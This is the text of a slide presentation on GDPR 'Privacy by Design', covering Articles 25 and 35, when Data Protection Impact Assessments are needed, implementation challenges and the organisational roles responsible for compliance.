1. Ian Goodwin CIPP/E, CIPM, CIPT, FIP Director of Information Governance & Risk Management, British Council
2. Introductions
- Examining the new GDPR rules around ‘Privacy by Design’.
- Presenting the challenges, the things you need to consider and possible ways to address them.
- Other challenges: organisational structures and key stakeholders.

3. Why adopting a ‘Privacy by Design’ approach is a good thing:
- Less costly.
- Increases awareness of privacy issues.
- Compliant from the start.

4. Art 25 – ‘Data Protection by design and by default’
Art 47 – ‘Binding corporate rules’

5. Art 25 (and Recital 78)
Consideration of the technical and organisational measures to be taken when processing personal data, to ensure that the requirements of the GDPR are met. Examples of technical and organisational measures include:
- minimising the processing of personal data,
- pseudonymising personal data as soon as possible,
- transparency around the purposes for processing,
- enabling the data subject to monitor the processing,
- enabling the data controller to enhance security features.

6. Art 35 – When is a DPIA needed?
‘…where the type of processing is likely to result in a high risk to the rights and freedoms of natural persons…’ A DPIA is needed prior to the processing.

7. When is a DPIA mandated in the regulation?
- High-risk processing.
- Systematic evaluation of personal aspects by automated means (including profiling), on which decisions are based that produce legal effects or similarly significantly affect the natural person.
- Processing of special categories of data on a large scale, or
- Systematic monitoring of a publicly accessible area on a large scale.

8. Art 35(7)
- A systematic description of the envisaged processing activities and the purposes for which the personal data will be processed.
- An assessment of the necessity and proportionality of the processing operations in relation to the purposes.
- An assessment of the risks (to data subjects) arising, and the measures adopted to mitigate those risks, in particular the safeguards and security measures to protect personal data and comply with the GDPR.

9. Challenges:
- Knowing what legacy assets you have and understanding their level of compliance.
- Embedding privacy practices (including when to do a DPIA).
- Cyclical review of completed DPIAs.
- Understanding and documenting your data flows.
- Supplier due diligence.
- Partnership arrangements.
- Profiling transparency.

10. Possible ways to address them:
- Building privacy into project and programme gateways.
- Automation of DPIA processes where possible.
- Risk-prioritising the information assets you are data-flow mapping.
- Reviewing and updating model contract templates.
- Reviewing and updating the data governance model with partner organisations.
- Updating fair collection notices to data subjects.

11. ‘Buy in’ from the top. Accountability is key. Awareness and understanding across the organisation.
Key stakeholders/roles:
- Data Protection Officer
- Information Asset Owner / Information Risk Owner
- Information Asset Manager / Data Steward
- Contract Management and Procurement staff
- IT/Digital colleagues
- Everyone else